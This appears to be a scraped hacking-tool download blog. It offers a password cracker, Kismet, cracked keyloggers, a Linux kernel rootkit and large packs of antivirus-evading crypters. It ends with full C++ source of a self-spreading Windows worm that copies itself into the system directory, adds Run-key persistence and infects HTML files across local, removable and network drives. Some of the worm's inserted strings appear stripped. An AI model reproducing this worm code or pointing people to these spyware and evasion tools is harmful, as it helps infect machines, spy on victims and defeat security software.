Password auditing and recovery tool for Windows NT/2000/XP/2003. Accounts information import: import from local computer, import from remote computer, import from SAM file, import from .LC file, import from .LCS file, import from PwDump file, import from Sniff file. Passwords recovering by dictionary attack, brute force attack, hybrid of dictionary and brute force attacks. Brute force session distribution: sessions distribution, sessions combining. Hashes computing: LM and NT hashes computin...

A good free alternative to L0phtcrack.

Free Download
Image and video hosting by TinyPic

LCP Download


Read more on this article...




Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

Free Download
Image and video hosting by TinyPic

Kismet Download


Read more on this article...

Keylogger collection - 8 in 1 keyloggers with cracks

This contains over 4319 KB of the best keylogges out their

------ Brutin added 13 Minutes and 30 Seconds later. ------

Sureshot Ghost Keylogger v.3.80
Quick Keylogger 2.1.027
Embrace
Family Key Logger
Easy Keyboard Logger v.1.0
Blazingtools Perfect Keylogger v.1.6.2.0
Ardamax Keylogger v.1.9

All with cracks

Free Download
Image and video hosting by TinyPic

Keylogger collection


Read more on this article...

jfirewall test

Posted by Bijay | 10:01 AM | , | 0 comments »

JFirewallTest is a free Java webstart application that tests for holes or open ports in your firewall. Unlike other solutions, JFirewallTest is a two stage testing procedure that tests all 65,536 ports very rapidly. After testing is complete, JFirewallTest will present a page of results reporting exactly what ports are open and accessible to others on the Internet.
Released: 2006-10-01
License: Freeware
Publisher: Michael Gardiner
Language: English
Platform: Windows, Linux, MAC
Requirements: Java Runtime Environment 1.4+
Install: Install and Uninstall

Free Download
Image and video hosting by TinyPic

jfirewall test
Read more on this article...

IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x


Free Download
Image and video hosting by TinyPic

IntoXonia 2 - LKM rootkit for Linux Kernel 2.6.x
Read more on this article...

RAR 1

01 - DarkAvengard Crypter
(Open source Code Crypter > p0ke >> Moded)
02 - h4ck-y0u.org crypter by DuSTY
03 - L0rD Crypter by haZl0oh
04 - AT4RE aSm Protecter 1.0 by Mouradpr
05 - AverCryptor 1.02 beta by os1r1s
06 - Cryptic 2.1 by Tughack
07 - Crew Crypter by North-Team
08 - Mortal Team Crypter 2.0 by Ras
09 - NOmeR1 by NOmeR1 and P.S.
10 - Poly! Crypt 2.8 by BUNG
11 - PowerCrypt 2.0 by N47RON
12 - Private Krypt 1.0 beta by t0pP8uZz
13 - PE Protector 0.9.2 CRYPToCRACK's by Lukas Fleischer
14 - Russian Cryptor 1.0 by master3
15 - SimbiOZ 2.1 by Extranger
16 - Snoop Crypt by snoop
17 - Zelda Crypt by snoop
18 - WinOfCrypt 1.0 by DarkPressure
19 - X-Crypter 1.2 Security-Bypass Version mod by Mareek
20 - X-Crypter 1.2 Private Version by x-zer0


RAR 2

01 - Break-Into-Pattern, a.k.a BIP, v.0.1 by Icingtaupe (ASM source)
02 - Crypter v.3.1 by SLESH 2007 (Delphi source)
03 - FFC v.1.6 Public by Juza
04 - File Crypter Pro by Aphex (Delphi source)
05 - GKrpto v.1.0 by User-99
06 - Open Source Code Crypter v.1.0 by p0ke (Delphi source)
07 - Open source file crypter (ass crypter) by assoftware (Delphi source)
08 - Pecrypt by archphase (Delphi source)
09 - Pscrambler v.1.2 by p0ke (Delphi source)
10 - Smokes Crypter v1.2 (Delphi source)
11 - Cigicigi File Crypter v1.0 by turkojan
12 - iPBProtect v0.1.5 beta [****] by Forgat
13 - MaskPE v.2.0 by yzkzero
14 - PEncrypt v.4.0 by JunkCode
15 - Perplex v.1.01dev by BliZZaRD
16 - SkD Undetectabler 2.0beta by skdrat
17 - ExeSax v.0.9.1 GUI
18 - VB-PE-Crypt 1.0 by Flo
19 - UnderGround Crypter v.1.0 by Booster2ooo
20 - Daemon Crypt v.2 Public by Evil_Inside


RAR 3

01 - SCE v.0.5 (Silly Chr Encrypter) by sevenC
02 - SSE v.0.5 (Simple Streverse Encryption) by sevenC
03 - Vbsencrypter v.0.01 by K
04 - File Crypter by valdir_salguei ro (from brasil - source code included)
05 - RCryptor by Vaska - included versions 1.1+1.3+1.3b+1.4+1.5+1.6b+1.6d
06 - iNF[CRYPT] by LESHIY & [nht]
07 - CryptoFilez v.2.0 by Mr.Ded
08 - Morphnah Beta2 by pyccxak.com Kas
09 - Pohernah v.1.0.2 by pyccxak.com Kas
10 - Pohernah v.1.0.3 by pyccxak.com Kas
11 - RPolyCrypt v.1.0b by Vasca
12 - StrAnGe CrYpTeR by TiPiaX (source code included)
13 - DalKrypt v1.0 by DalKiT (source code included)
14 - fEaRz Crypter v.1.0 beta1 by fEaRz
15 - Icrypt v.1.0 by BuGGz
16 - Minke v.1.0.1 by Codius
17 - Scramble Tool v0.2.3b By System33r (k0nsl)
18 - USC by p0ke - included versions 1.2D+2.1+2.1.1+Patch for 2.1.1
19 - NoodleCrypt 2 by NoodleSpa
20 - Werus Crypter v.1.0 Public version by pyccxak.com Kas


Free Download
Image and video hosting by TinyPic

Huge Pack Of Cryptors

Read more on this article...

#26597;看作者资料 发送短消息 引用回复这个帖子 推荐此帖

HTML Worm
// Name: Win32.HTMLworm
// Author: WarGame
// Compiler: Borland C++
// Description: This worm spreads by adding a link to itself in html files
// Improvements: You could add a link to a page containing an IE exploits :)

#include
#include
using namespace std; // :)

// This function does the real work
void HTMLSpread(char *htmlfile)
{
HANDLE html_fd;
DWORD html_filesize,read_bytes,written_bytes;
char *c_htmlcode = NULL;
string *htmlcode = NULL; // make it simpler
long pos;

// open the html file
html_fd = CreateFile(htmlfile,GENERIC_READ|GENERIC_WRITE,
FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);

if(html_fd == INVALID_HANDLE_VALUE)
{
return;
}

// get file size
html_filesize = GetFileSize(html_fd,NULL);

// allocate enough memory
c_htmlcode = (char *)malloc(html_filesize);

if(c_htmlcode == NULL)
{
return;
}

// read entire file
if(ReadFile(html_fd,c_htmlcode,html_filesize,&read_bytes,NULL) == 0)
{
CloseHandle(html_fd);
return;
}

// create a string object
htmlcode = new string(c_htmlcode);
free(c_htmlcode);

// already infected ?
if(htmlcode->find("") == string::npos)
{

pos = htmlcode->find("");

if(pos == string::npos)
{
pos = htmlcode->find("");

if(pos == string::npos)
{
CloseHandle(html_fd);
delete htmlcode;
return;
}
}

// add link
htmlcode->replace(pos,7,"\r\n\r\n");

// write new file
SetFilePointer(html_fd,0,0,FILE_BEGIN);
WriteFile(html_fd,htmlcode->c_str(),htmlcode->size(),&written_bytes,NULL);
// infection mark
WriteFile(html_fd,"",36,&written_bytes,NULL);

}

// close all
CloseHandle(html_fd);
delete htmlcode;

}

// add worm to startup list
void AutoStart(char *my_path)
{
HKEY hkey;

if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
KEY_WRITE,&hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
RegCloseKey(hkey);
}

if(RegOpenKeyEx(HKEY_CURRENT_USER,
"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,
KEY_WRITE,&hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,"himon",0,REG_SZ,my_path,strlen(my_path));
RegCloseKey(hkey);
}
}

// This will scan drives for html files
void S3arch(char *pt) {
char sc[MAX_PATH],buf[MAX_PATH];
WIN32_FIND_DATA in;
HANDLE fd,file;
char *fm = "%s\\%s",*fm1 = "%s\\*.*";

if(strlen(pt) == 3)
{
pt[2] = '\0'; /* :-) */
}

sprintf(sc,fm1,pt);
fd = FindFirstFile(sc,&in);

do
{

sprintf(buf,fm,pt,in.cFileName);

/* dot :) */
if(strcmp(in.cFileName,"..") != 0 && strcmp(in.cFileName,".") != 0 && (in.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
{
S3arch(buf);
}

/* File found */
else
{

/* is it good to infect ? */

if(strstr(in.cFileName,".html") || strstr(in.cFileName,".htm"))
{
HTMLSpread(buf);
}
}

}while(FindNextFile(fd,&in));

FindClose(fd);
}


// entry point of worm
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
// usual shit: installation part, startup and so on ...
char I_am_here[MAX_PATH],installation_path[MAX_PATH];
char Drives[3],Drive = 0;
UINT drive_type;


// only one copy
CreateMutex(NULL,FALSE,"__HTMLworm_by_WarGame_EOF__");
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
ExitProcess(0);
}

GetSystemDirectory(installation_path,MAX_PATH);
strcat(installation_path,"\\himon.exe");

GetModuleFileName(NULL,I_am_here,MAX_PATH);
// Copy!
CopyFile(I_am_here,installation_path,FALSE);
AutoStart(installation_path);


// the real part starts here
while(1)
{

/* Search for drives */
for(Drive = 'C';Drive <= 'Z';Drive++)
{
Drives[0] = Drive;
Drives[1] = ':';
Drives[2] = '\\';
Drives[3] = '\0';

/* drive ? */
drive_type = GetDriveType(Drives);

/* only fixed, remote and removable drives */
if(drive_type == DRIVE_FIXED ||
drive_type == DRIVE_REMOTE ||
drive_type == DRIVE_REMOVABLE)
{
/* GO! */
S3arch(Drives);
}
}

/* every 10 minutes */
Sleep((1000*60)*10);
}
}

Read more on this article...